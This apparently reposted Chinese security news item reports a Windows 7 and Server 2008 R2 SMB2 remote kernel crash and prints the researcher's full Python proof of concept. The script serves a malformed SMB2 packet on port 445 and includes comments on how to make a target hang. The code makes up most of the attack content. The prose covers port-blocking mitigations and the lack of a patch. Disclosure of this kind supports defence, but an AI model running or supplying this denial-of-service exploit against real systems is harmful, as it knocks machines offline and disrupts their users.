微软证实第一个Win7的0day漏洞已经出现(附溢出程序)

标签:
微软win70day安全漏洞laurentgaffieit |
分类: 信息安全 |
附代码演示:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite
loop)
#Crash in KeAccumulateTicks() due to
NT_ASSERT()/DbgRaiseAssertionFailure
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH ,
instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should
be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all
interfaces port 445
launch.serve_forever()
#SDL FAILED
虽然微软过去确实出现过SMB协议的安全漏洞,但安全研究人员指出,使用默认的防火墙设置这种安全漏洞就很难被利用。但有一种绕过这个安全漏洞的方法是,封锁路由器或者防火墙上的135、139和445端口以阻止外部的SMB通讯进入系统。
业界人士对研究人员指出windows7系统出现安全漏洞并不感意外,认为windows7的代码早在今年夏季就最终确定了,攻击者能够有充足的时间去寻找其中的漏洞。微软尚未确定何时发布修复补丁。直到现在,用户得到的建议只是封锁路由器或者防火墙上的135、139和445端口。不过此法帮助不大,因为这样的方法也将禁止浏览器、网络文件共享和一些几户每天计算机用户都要使用到的其他服务。
相关链接:
1、Laurent Gaffie博客:http://g-laurent.blogspot.com/
2、Windows 7 , Server 2008R2 Remote Kernel Crash laurent gaffie (Nov 11)http://seclists.org/fulldisclosure/2009/Nov/134